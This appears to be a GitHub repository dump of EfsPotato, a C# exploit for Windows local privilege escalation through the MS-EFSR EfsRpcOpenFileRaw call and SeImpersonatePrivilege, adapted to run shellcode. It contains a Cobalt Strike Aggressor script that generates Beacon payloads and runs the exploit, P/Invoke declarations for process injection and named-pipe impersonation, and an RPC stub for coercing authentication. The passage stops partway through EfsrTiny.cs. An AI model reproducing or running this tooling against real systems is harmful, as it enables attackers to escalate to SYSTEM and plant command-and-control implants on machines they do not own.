├── 3.png
├── README.md
├── EfsPotato
├── EfsPotato.cna
├── Properties
│ └── AssemblyInfo.cs
├── EfsPotato.sln
├── EfsPotato.csproj
├── APIDef.cs
├── EfsrTiny.cs
└── Program.cs
├── LICENSE
└── .gitignore
/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0neAtSec/EfsPotato-1/HEAD/3.png
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # EfsPotato
2 | MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability
3 |
4 | 艹老师的原版:https://github.com/zcgonvh/EfsPotato
5 |
6 | 我改成了执行shellcode,方便cs使用的版本。
7 |
8 | 
9 |
--------------------------------------------------------------------------------
/EfsPotato/EfsPotato.cna:
--------------------------------------------------------------------------------
1 | # EfsPotato built as C# exe
2 | #
3 | # Author: L.N.
4 | # GitHub: https://github.com/AttackTeamFamily/EfsPotato
5 | #
6 |
7 | sub EfsPotato {
8 | local('$shellcode $arch $exe');
9 |
10 | # acknowledge this command
11 | btask($1, "Task Beacon to run " . listener_describe($2) . " via EfsPotato", "T1068");
12 |
13 | # tune our parameters based on the target arch
14 | if (-is64 $1)
15 | {
16 | $arch = "x64";
17 | } else {
18 | $arch = "x86";
19 | }
20 |
21 | $exe = script_resource("EfsPotato.exe");
22 |
23 | # generate our shellcode && use stageless
24 | $shellcode = base64_encode(artifact_payload($2, "raw", $arch));
25 |
26 | # spawn a Beacon post-ex job with bexecute_assembly
27 | bexecute_assembly!($1, $exe, $shellcode);
28 |
29 | # link to our payload if it's a TCP or SMB Beacon
30 | beacon_link($1, $null, $2);
31 | }
32 | beacon_exploit_register("EfsPotato", "MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability", &EfsPotato);
33 |
--------------------------------------------------------------------------------
/EfsPotato/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // 有关程序集的一般信息由以下
6 | // 控制。更改这些特性值可修改
7 | // 与程序集关联的信息。
8 | [assembly: AssemblyTitle("EfsPotato")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("EfsPotato")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // 将 ComVisible 设置为 false 会使此程序集中的类型
18 | //对 COM 组件不可见。如果需要从 COM 访问此程序集中的类型
19 | //请将此类型的 ComVisible 特性设置为 true。
20 | [assembly: ComVisible(false)]
21 |
22 | // 如果此项目向 COM 公开,则下列 GUID 用于类型库的 ID
23 | [assembly: Guid("5243ab4d-12e2-4059-a529-2b007ec26320")]
24 |
25 | // 程序集的版本信息由下列四个值组成:
26 | //
27 | // 主版本
28 | // 次版本
29 | // 生成号
30 | // 修订号
31 | //
32 | //可以指定所有这些值,也可以使用“生成号”和“修订号”的默认值
33 | //通过使用 "*",如下所示:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2021 公鸡队之家
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/EfsPotato/EfsPotato.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.30309.148
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "EfsPotato", "EfsPotato.csproj", "{5243AB4D-12E2-4059-A529-2B007EC26320}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {5243AB4D-12E2-4059-A529-2B007EC26320}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {5243AB4D-12E2-4059-A529-2B007EC26320}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {5243AB4D-12E2-4059-A529-2B007EC26320}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {5243AB4D-12E2-4059-A529-2B007EC26320}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {729EA5CF-BE7D-41A9-8DEB-17FE3A7FBB6F}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/EfsPotato/EfsPotato.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {5243AB4D-12E2-4059-A529-2B007EC26320}
8 | Exe
9 | EfsPotato
10 | EfsPotato
11 | v3.5
12 | 512
13 | true
14 |
15 |
16 | AnyCPU
17 | true
18 | full
19 | false
20 | bin\Debug\
21 | DEBUG;TRACE
22 | prompt
23 | 4
24 |
25 |
26 | AnyCPU
27 | pdbonly
28 | true
29 | bin\Release\
30 | TRACE
31 | prompt
32 | 4
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | ## Ignore Visual Studio temporary files, build results, and
2 | ## files generated by popular Visual Studio add-ons.
3 | ##
4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
5 |
6 | # User-specific files
7 | *.rsuser
8 | *.suo
9 | *.user
10 | *.userosscache
11 | *.sln.docstates
12 |
13 | # User-specific files (MonoDevelop/Xamarin Studio)
14 | *.userprefs
15 |
16 | # Mono auto generated files
17 | mono_crash.*
18 |
19 | # Build results
20 | [Dd]ebug/
21 | [Dd]ebugPublic/
22 | [Rr]elease/
23 | [Rr]eleases/
24 | x64/
25 | x86/
26 | [Aa][Rr][Mm]/
27 | [Aa][Rr][Mm]64/
28 | bld/
29 | [Bb]in/
30 | [Oo]bj/
31 | [Ll]og/
32 | [Ll]ogs/
33 |
34 | # Visual Studio 2015/2017 cache/options directory
35 | .vs/
36 | # Uncomment if you have tasks that create the project's static files in wwwroot
37 | #wwwroot/
38 |
39 | # Visual Studio 2017 auto generated files
40 | Generated\ Files/
41 |
42 | # MSTest test Results
43 | [Tt]est[Rr]esult*/
44 | [Bb]uild[Ll]og.*
45 |
46 | # NUnit
47 | *.VisualState.xml
48 | TestResult.xml
49 | nunit-*.xml
50 |
51 | # Build Results of an ATL Project
52 | [Dd]ebugPS/
53 | [Rr]eleasePS/
54 | dlldata.c
55 |
56 | # Benchmark Results
57 | BenchmarkDotNet.Artifacts/
58 |
59 | # .NET Core
60 | project.lock.json
61 | project.fragment.lock.json
62 | artifacts/
63 |
64 | # StyleCop
65 | StyleCopReport.xml
66 |
67 | # Files built by Visual Studio
68 | *_i.c
69 | *_p.c
70 | *_h.h
71 | *.ilk
72 | *.meta
73 | *.obj
74 | *.iobj
75 | *.pch
76 | *.pdb
77 | *.ipdb
78 | *.pgc
79 | *.pgd
80 | *.rsp
81 | *.sbr
82 | *.tlb
83 | *.tli
84 | *.tlh
85 | *.tmp
86 | *.tmp_proj
87 | *_wpftmp.csproj
88 | *.log
89 | *.vspscc
90 | *.vssscc
91 | .builds
92 | *.pidb
93 | *.svclog
94 | *.scc
95 |
96 | # Chutzpah Test files
97 | _Chutzpah*
98 |
99 | # Visual C++ cache files
100 | ipch/
101 | *.aps
102 | *.ncb
103 | *.opendb
104 | *.opensdf
105 | *.sdf
106 | *.cachefile
107 | *.VC.db
108 | *.VC.VC.opendb
109 |
110 | # Visual Studio profiler
111 | *.psess
112 | *.vsp
113 | *.vspx
114 | *.sap
115 |
116 | # Visual Studio Trace Files
117 | *.e2e
118 |
119 | # TFS 2012 Local Workspace
120 | $tf/
121 |
122 | # Guidance Automation Toolkit
123 | *.gpState
124 |
125 | # ReSharper is a .NET coding add-in
126 | _ReSharper*/
127 | *.[Rr]e[Ss]harper
128 | *.DotSettings.user
129 |
130 | # TeamCity is a build add-in
131 | _TeamCity*
132 |
133 | # DotCover is a Code Coverage Tool
134 | *.dotCover
135 |
136 | # AxoCover is a Code Coverage Tool
137 | .axoCover/*
138 | !.axoCover/settings.json
139 |
140 | # Visual Studio code coverage results
141 | *.coverage
142 | *.coveragexml
143 |
144 | # NCrunch
145 | _NCrunch_*
146 | .*crunch*.local.xml
147 | nCrunchTemp_*
148 |
149 | # MightyMoose
150 | *.mm.*
151 | AutoTest.Net/
152 |
153 | # Web workbench (sass)
154 | .sass-cache/
155 |
156 | # Installshield output folder
157 | [Ee]xpress/
158 |
159 | # DocProject is a documentation generator add-in
160 | DocProject/buildhelp/
161 | DocProject/Help/*.HxT
162 | DocProject/Help/*.HxC
163 | DocProject/Help/*.hhc
164 | DocProject/Help/*.hhk
165 | DocProject/Help/*.hhp
166 | DocProject/Help/Html2
167 | DocProject/Help/html
168 |
169 | # Click-Once directory
170 | publish/
171 |
172 | # Publish Web Output
173 | *.[Pp]ublish.xml
174 | *.azurePubxml
175 | # Note: Comment the next line if you want to checkin your web deploy settings,
176 | # but database connection strings (with potential passwords) will be unencrypted
177 | *.pubxml
178 | *.publishproj
179 |
180 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
181 | # checkin your Azure Web App publish settings, but sensitive information contained
182 | # in these scripts will be unencrypted
183 | PublishScripts/
184 |
185 | # NuGet Packages
186 | *.nupkg
187 | # NuGet Symbol Packages
188 | *.snupkg
189 | # The packages folder can be ignored because of Package Restore
190 | **/[Pp]ackages/*
191 | # except build/, which is used as an MSBuild target.
192 | !**/[Pp]ackages/build/
193 | # Uncomment if necessary however generally it will be regenerated when needed
194 | #!**/[Pp]ackages/repositories.config
195 | # NuGet v3's project.json files produces more ignorable files
196 | *.nuget.props
197 | *.nuget.targets
198 |
199 | # Microsoft Azure Build Output
200 | csx/
201 | *.build.csdef
202 |
203 | # Microsoft Azure Emulator
204 | ecf/
205 | rcf/
206 |
207 | # Windows Store app package directories and files
208 | AppPackages/
209 | BundleArtifacts/
210 | Package.StoreAssociation.xml
211 | _pkginfo.txt
212 | *.appx
213 | *.appxbundle
214 | *.appxupload
215 |
216 | # Visual Studio cache files
217 | # files ending in .cache can be ignored
218 | *.[Cc]ache
219 | # but keep track of directories ending in .cache
220 | !?*.[Cc]ache/
221 |
222 | # Others
223 | ClientBin/
224 | ~$*
225 | *~
226 | *.dbmdl
227 | *.dbproj.schemaview
228 | *.jfm
229 | *.pfx
230 | *.publishsettings
231 | orleans.codegen.cs
232 |
233 | # Including strong name files can present a security risk
234 | # (https://github.com/github/gitignore/pull/2483#issue-259490424)
235 | #*.snk
236 |
237 | # Since there are multiple workflows, uncomment next line to ignore bower_components
238 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
239 | #bower_components/
240 |
241 | # RIA/Silverlight projects
242 | Generated_Code/
243 |
244 | # Backup & report files from converting an old project file
245 | # to a newer Visual Studio version. Backup files are not needed,
246 | # because we have git ;-)
247 | _UpgradeReport_Files/
248 | Backup*/
249 | UpgradeLog*.XML
250 | UpgradeLog*.htm
251 | ServiceFabricBackup/
252 | *.rptproj.bak
253 |
254 | # SQL Server files
255 | *.mdf
256 | *.ldf
257 | *.ndf
258 |
259 | # Business Intelligence projects
260 | *.rdl.data
261 | *.bim.layout
262 | *.bim_*.settings
263 | *.rptproj.rsuser
264 | *- [Bb]ackup.rdl
265 | *- [Bb]ackup ([0-9]).rdl
266 | *- [Bb]ackup ([0-9][0-9]).rdl
267 |
268 | # Microsoft Fakes
269 | FakesAssemblies/
270 |
271 | # GhostDoc plugin setting file
272 | *.GhostDoc.xml
273 |
274 | # Node.js Tools for Visual Studio
275 | .ntvs_analysis.dat
276 | node_modules/
277 |
278 | # Visual Studio 6 build log
279 | *.plg
280 |
281 | # Visual Studio 6 workspace options file
282 | *.opt
283 |
284 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
285 | *.vbw
286 |
287 | # Visual Studio LightSwitch build output
288 | **/*.HTMLClient/GeneratedArtifacts
289 | **/*.DesktopClient/GeneratedArtifacts
290 | **/*.DesktopClient/ModelManifest.xml
291 | **/*.Server/GeneratedArtifacts
292 | **/*.Server/ModelManifest.xml
293 | _Pvt_Extensions
294 |
295 | # Paket dependency manager
296 | .paket/paket.exe
297 | paket-files/
298 |
299 | # FAKE - F# Make
300 | .fake/
301 |
302 | # CodeRush personal settings
303 | .cr/personal
304 |
305 | # Python Tools for Visual Studio (PTVS)
306 | __pycache__/
307 | *.pyc
308 |
309 | # Cake - Uncomment if you are using it
310 | # tools/**
311 | # !tools/packages.config
312 |
313 | # Tabs Studio
314 | *.tss
315 |
316 | # Telerik's JustMock configuration file
317 | *.jmconfig
318 |
319 | # BizTalk build output
320 | *.btp.cs
321 | *.btm.cs
322 | *.odx.cs
323 | *.xsd.cs
324 |
325 | # OpenCover UI analysis results
326 | OpenCover/
327 |
328 | # Azure Stream Analytics local run output
329 | ASALocalRun/
330 |
331 | # MSBuild Binary and Structured Log
332 | *.binlog
333 |
334 | # NVidia Nsight GPU debugger configuration file
335 | *.nvuser
336 |
337 | # MFractors (Xamarin productivity tool) working folder
338 | .mfractor/
339 |
340 | # Local History for Visual Studio
341 | .localhistory/
342 |
343 | # BeatPulse healthcheck temp database
344 | healthchecksdb
345 |
346 | # Backup folder for Package Reference Convert tool in Visual Studio 2017
347 | MigrationBackup/
348 |
349 | # Ionide (cross platform F# VS Code tools) working folder
350 | .ionide/
351 |
--------------------------------------------------------------------------------
/EfsPotato/APIDef.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 |
4 | namespace EfsPotato
5 | {
6 | class APIDef
7 | {
8 | #region shellcode inject
9 | public static UInt32 MEM_COMMIT = 0x1000;
10 | public static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
11 | public static UInt32 PAGE_READWRITE = 0x04;
12 | public static UInt32 PAGE_EXECUTE_READ = 0x20;
13 |
14 | [Flags]
15 | public enum ProcessAccessFlags : uint
16 | {
17 | All = 0x001F0FFF,
18 | Terminate = 0x00000001,
19 | CreateThread = 0x00000002,
20 | VirtualMemoryOperation = 0x00000008,
21 | VirtualMemoryRead = 0x00000010,
22 | VirtualMemoryWrite = 0x00000020,
23 | DuplicateHandle = 0x00000040,
24 | CreateProcess = 0x000000080,
25 | SetQuota = 0x00000100,
26 | SetInformation = 0x00000200,
27 | QueryInformation = 0x00000400,
28 | QueryLimitedInformation = 0x00001000,
29 | Synchronize = 0x00100000
30 | }
31 |
32 | [Flags]
33 | public enum ProcessCreationFlags : uint
34 | {
35 | ZERO_FLAG = 0x00000000,
36 | CREATE_BREAKAWAY_FROM_JOB = 0x01000000,
37 | CREATE_DEFAULT_ERROR_MODE = 0x04000000,
38 | CREATE_NEW_CONSOLE = 0x00000010,
39 | CREATE_NEW_PROCESS_GROUP = 0x00000200,
40 | CREATE_NO_WINDOW = 0x08000000,
41 | CREATE_PROTECTED_PROCESS = 0x00040000,
42 | CREATE_PRESERVE_CODE_AUTHZ_LEVEL = 0x02000000,
43 | CREATE_SEPARATE_WOW_VDM = 0x00001000,
44 | CREATE_SHARED_WOW_VDM = 0x00001000,
45 | CREATE_SUSPENDED = 0x00000004,
46 | CREATE_UNICODE_ENVIRONMENT = 0x00000400,
47 | DEBUG_ONLY_THIS_PROCESS = 0x00000002,
48 | DEBUG_PROCESS = 0x00000001,
49 | DETACHED_PROCESS = 0x00000008,
50 | EXTENDED_STARTUPINFO_PRESENT = 0x00080000,
51 | INHERIT_PARENT_AFFINITY = 0x00010000
52 | }
53 | /*
54 | public struct PROCESS_INFORMATION
55 | {
56 | public IntPtr hProcess;
57 | public IntPtr hThread;
58 | public uint dwProcessId;
59 | public uint dwThreadId;
60 | }
61 | public struct STARTUPINFO
62 | {
63 | public uint cb;
64 | public string lpReserved;
65 | public string lpDesktop;
66 | public string lpTitle;
67 | public uint dwX;
68 | public uint dwY;
69 | public uint dwXSize;
70 | public uint dwYSize;
71 | public uint dwXCountChars;
72 | public uint dwYCountChars;
73 | public uint dwFillAttribute;
74 | public uint dwFlags;
75 | public short wShowWindow;
76 | public short cbReserved2;
77 | public IntPtr lpReserved2;
78 | public IntPtr hStdInput;
79 | public IntPtr hStdOutput;
80 | public IntPtr hStdError;
81 | }
82 | */
83 | [Flags]
84 | public enum ThreadAccess : int
85 | {
86 | TERMINATE = (0x0001),
87 | SUSPEND_RESUME = (0x0002),
88 | GET_CONTEXT = (0x0008),
89 | SET_CONTEXT = (0x0010),
90 | SET_INFORMATION = (0x0020),
91 | QUERY_INFORMATION = (0x0040),
92 | SET_THREAD_TOKEN = (0x0080),
93 | IMPERSONATE = (0x0100),
94 | DIRECT_IMPERSONATION = (0x0200)
95 | }
96 |
97 | [DllImport("kernel32.dll", SetLastError = true)]
98 | public static extern IntPtr OpenThread(ThreadAccess dwDesiredAccess, bool bInheritHandle,
99 | int dwThreadId);
100 |
101 | [DllImport("kernel32.dll", SetLastError = true)]
102 | public static extern bool WriteProcessMemory(
103 | IntPtr hProcess,
104 | IntPtr lpBaseAddress,
105 | byte[] lpBuffer,
106 | int nSize,
107 | out IntPtr lpNumberOfBytesWritten);
108 |
109 | [DllImport("kernel32.dll")]
110 | public static extern IntPtr QueueUserAPC(IntPtr pfnAPC, IntPtr hThread, IntPtr dwData);
111 |
112 | [DllImport("kernel32")]
113 | public static extern IntPtr VirtualAlloc(UInt32 lpStartAddr,
114 | Int32 size, UInt32 flAllocationType, UInt32 flProtect);
115 | [DllImport("kernel32.dll", SetLastError = true)]
116 | public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress,
117 | Int32 dwSize, UInt32 flAllocationType, UInt32 flProtect);
118 |
119 | [DllImport("kernel32.dll", SetLastError = true)]
120 | public static extern IntPtr OpenProcess(
121 | ProcessAccessFlags processAccess,
122 | bool bInheritHandle,
123 | int processId
124 | );
125 |
126 | [DllImport("kernel32.dll")]
127 | public static extern bool CreateProcess(string lpApplicationName, string lpCommandLine, IntPtr lpProcessAttributes, IntPtr lpThreadAttributes, bool bInheritHandles, ProcessCreationFlags dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, ref STARTUPINFO lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation);
128 | [DllImport("kernel32.dll")]
129 | public static extern uint ResumeThread(IntPtr hThread);
130 | [DllImport("kernel32.dll")]
131 | public static extern uint SuspendThread(IntPtr hThread);
132 | [DllImport("kernel32.dll")]
133 | public static extern bool VirtualProtectEx(IntPtr hProcess, IntPtr lpAddress,
134 | int dwSize, uint flNewProtect, out uint lpflOldProtect);
135 | #endregion
136 |
137 | #region pinvoke
138 | //just copy-paste from stackoverflow,pinvoke.net,etc
139 | [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
140 | public static extern IntPtr CreateFile(string lpFileName, int access, int share, IntPtr sa, int cd, int flag, IntPtr zero);
141 | [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
142 | public static extern IntPtr CreateNamedPipe(string name, int i1, int i2, int i3, int i4, int i5, int i6, IntPtr zero);
143 | [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
144 | public static extern IntPtr ConnectNamedPipe(IntPtr pipe, IntPtr zero);
145 | [DllImport("advapi32.dll", SetLastError = true)]
146 | public static extern bool ImpersonateNamedPipeClient(IntPtr pipe);
147 | [DllImport("kernel32.dll", CharSet = CharSet.Auto, ExactSpelling = true, SetLastError = true)]
148 | public static extern bool CloseHandle(IntPtr handle);
149 |
150 | [DllImport("advapi32.dll", SetLastError = true)]
151 | public static extern bool AdjustTokenPrivileges(IntPtr TokenHandle, bool DisableAllPrivileges, ref TOKEN_PRIVILEGES NewState, int Bufferlength, IntPtr PreviousState, IntPtr ReturnLength);
152 |
153 | [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
154 | public static extern bool CreatePipe(out IntPtr hReadPipe, out IntPtr hWritePipe, ref SECURITY_ATTRIBUTES lpPipeAttributes, int nSize);
155 |
156 | [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Auto)]
157 | [return: MarshalAs(UnmanagedType.Bool)]
158 | public static extern bool LookupPrivilegeValue(string lpSystemName, string lpName, out LUID lpLuid);
159 |
160 | [StructLayout(LayoutKind.Sequential)]
161 | public struct TOKEN_PRIVILEGES
162 | {
163 | public uint PrivilegeCount;
164 | [MarshalAs(UnmanagedType.ByValArray, SizeConst = 1)]
165 | public LUID_AND_ATTRIBUTES[] Privileges;
166 | }
167 |
168 | [StructLayout(LayoutKind.Sequential)]
169 | public struct LUID_AND_ATTRIBUTES
170 | {
171 | public LUID Luid;
172 | public UInt32 Attributes;
173 | }
174 | [StructLayout(LayoutKind.Sequential)]
175 | public struct LUID
176 | {
177 | public uint LowPart;
178 | public int HighPart;
179 | }
180 |
181 | [DllImport("advapi32", SetLastError = true, CharSet = CharSet.Unicode)]
182 | public static extern bool CreateProcessAsUser(IntPtr hToken, string lpApplicationName, string lpCommandLine, IntPtr lpProcessAttributes, IntPtr lpThreadAttributes, bool bInheritHandles, int dwCreationFlags, IntPtr lpEnvironment, IntPtr lpCurrentDirectory, ref STARTUPINFO lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation);
183 |
184 | [StructLayout(LayoutKind.Sequential)]
185 | public struct PROCESS_INFORMATION
186 | {
187 | public IntPtr hProcess;
188 | public IntPtr hThread;
189 | public int dwProcessId;
190 | public int dwThreadId;
191 | }
192 | [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
193 | public struct STARTUPINFO
194 | {
195 | public Int32 cb;
196 | public string lpReserved;
197 | public string lpDesktop;
198 | public string lpTitle;
199 | public Int32 dwX;
200 | public Int32 dwY;
201 | public Int32 dwXSize;
202 | public Int32 dwYSize;
203 | public Int32 dwXCountChars;
204 | public Int32 dwYCountChars;
205 | public Int32 dwFillAttribute;
206 | public Int32 dwFlags;
207 | public Int16 wShowWindow;
208 | public Int16 cbReserved2;
209 | public IntPtr lpReserved2;
210 | public IntPtr hStdInput;
211 | public IntPtr hStdOutput;
212 | public IntPtr hStdError;
213 | }
214 | [StructLayout(LayoutKind.Sequential)]
215 | public struct SECURITY_ATTRIBUTES
216 | {
217 | public int nLength;
218 | public IntPtr pSecurityDescriptor;
219 | public int bInheritHandle;
220 | }
221 | #endregion
222 | }
223 | }
224 |
--------------------------------------------------------------------------------
/EfsPotato/EfsrTiny.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 |
4 |
5 | namespace EfsPotato
6 | {
7 | //this code just copy-paste from gist
8 | //orig class: rprn
9 | //some changed for MS-EFSR
10 | class EfsrTiny
11 | {
12 | [DllImport("Rpcrt4.dll", EntryPoint = "RpcBindingFromStringBindingW", CallingConvention = CallingConvention.StdCall, CharSet = CharSet.Unicode, SetLastError = false)]
13 | private static extern Int32 RpcBindingFromStringBinding(String bindingString, out IntPtr lpBinding);
14 |
15 | [DllImport("Rpcrt4.dll", EntryPoint = "NdrClientCall2", CallingConvention = CallingConvention.Cdecl, CharSet = CharSet.Unicode, SetLastError = false)]
16 | private static extern IntPtr NdrClientCall2x86(IntPtr pMIDL_STUB_DESC, IntPtr formatString, IntPtr args);
17 |
18 | [DllImport("Rpcrt4.dll", EntryPoint = "RpcBindingFree", CallingConvention = CallingConvention.StdCall, CharSet = CharSet.Unicode, SetLastError = false)]
19 | private static extern Int32 RpcBindingFree(ref IntPtr lpString);
20 |
21 | [DllImport("Rpcrt4.dll", EntryPoint = "RpcStringBindingComposeW", CallingConvention = CallingConvention.StdCall, CharSet = CharSet.Unicode, SetLastError = false)]
22 | private static extern Int32 RpcStringBindingCompose(String ObjUuid, String ProtSeq, String NetworkAddr, String Endpoint, String Options, out IntPtr lpBindingString);
23 |
24 | [DllImport("Rpcrt4.dll", EntryPoint = "RpcBindingSetOption", CallingConvention = CallingConvention.StdCall, SetLastError = false)]
25 | private static extern Int32 RpcBindingSetOption(IntPtr Binding, UInt32 Option, IntPtr OptionValue);
26 |
27 | [DllImport("Rpcrt4.dll", EntryPoint = "NdrClientCall2", CallingConvention = CallingConvention.Cdecl, CharSet = CharSet.Unicode, SetLastError = false)]
28 | internal static extern IntPtr NdrClientCall2x64(IntPtr pMIDL_STUB_DESC, IntPtr formatString, IntPtr binding, out IntPtr hContext, string FileName, int Flags);
29 |
30 | private static byte[] MIDL_ProcFormatStringx86 = new byte[] { 0x00, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x14, 0x00, 0x32, 0x00, 0x00, 0x00, 0x08, 0x00, 0x40, 0x00, 0x46, 0x04, 0x08, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x01, 0x04, 0x00, 0x06, 0x00, 0x0b, 0x01, 0x08, 0x00, 0x0c, 0x00, 0x48, 0x00, 0x0c, 0x00, 0x08, 0x00, 0x70, 0x00, 0x10, 0x00, 0x08, 0x00, 0x00, 0x00 };
31 |
32 | private static byte[] MIDL_ProcFormatStringx64 = new byte[] { 0x00, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x28, 0x00, 0x32, 0x00, 0x00, 0x00, 0x08, 0x00, 0x40, 0x00, 0x46, 0x04, 0x0a, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x01, 0x08, 0x00, 0x06, 0x00, 0x0b, 0x01, 0x10, 0x00, 0x0c, 0x00, 0x48, 0x00, 0x18, 0x00, 0x08, 0x00, 0x70, 0x00, 0x20, 0x00, 0x08, 0x00, 0x00, 0x00 };
33 |
34 | private static byte[] MIDL_TypeFormatStringx86 = new byte[] { 0x00, 0x00, 0x00, 0x00, 0x11, 0x04, 0x02, 0x00, 0x30, 0xa0, 0x00, 0x00, 0x11, 0x08, 0x25, 0x5c, 0x00, 0x00 };
35 |
36 | private static byte[] MIDL_TypeFormatStringx64 = new byte[] { 0x00, 0x00, 0x00, 0x00, 0x11, 0x04, 0x02, 0x00, 0x30, 0xa0, 0x00, 0x00, 0x11, 0x08, 0x25, 0x5c, 0x00, 0x00 };
37 | Guid interfaceId;
38 | public EfsrTiny()
39 | {
40 | interfaceId = new Guid("c681d488-d850-11d0-8c52-00c04fd90f7e");
41 | if (IntPtr.Size == 8)
42 | {
43 | InitializeStub(interfaceId, MIDL_ProcFormatStringx64, MIDL_TypeFormatStringx64, "\\pipe\\lsarpc", 1, 0);
44 | }
45 | else
46 | {
47 | InitializeStub(interfaceId, MIDL_ProcFormatStringx86, MIDL_TypeFormatStringx86, "\\pipe\\lsarpc", 1, 0);
48 | }
49 | }
50 |
51 | ~EfsrTiny()
52 | {
53 | freeStub();
54 | }
55 | public int EfsRpcOpenFileRaw(out IntPtr hContext, string FileName, int Flags)
56 | {
57 | IntPtr result = IntPtr.Zero;
58 | IntPtr pfn = Marshal.StringToHGlobalUni(FileName);
59 |
60 | hContext = IntPtr.Zero;
61 | try
62 | {
63 | if (IntPtr.Size == 8)
64 | {
65 | result = NdrClientCall2x64(GetStubHandle(), GetProcStringHandle(2), Bind(Marshal.StringToHGlobalUni("localhost")), out hContext, FileName, Flags);
66 | }
67 | else
68 | {
69 | IntPtr tempValue = IntPtr.Zero;
70 | GCHandle handle = GCHandle.Alloc(tempValue, GCHandleType.Pinned);
71 | IntPtr tempValuePointer = handle.AddrOfPinnedObject();
72 | try
73 | {
74 | result = CallNdrClientCall2x86(2, Bind(Marshal.StringToHGlobalUni("localhost")), tempValuePointer, pfn, IntPtr.Zero);
75 | // each pinvoke work on a copy of the arguments (without an out specifier)
76 | // get back the data
77 | hContext = Marshal.ReadIntPtr(tempValuePointer);
78 | }
79 | finally
80 | {
81 | handle.Free();
82 | }
83 | }
84 | }
85 | catch (SEHException)
86 | {
87 | int err = Marshal.GetExceptionCode();
88 | Console.WriteLine("[x] EfsRpcOpenFileRaw failed: " + err);
89 | return err;
90 | }
91 | finally
92 | {
93 | if (pfn != IntPtr.Zero)
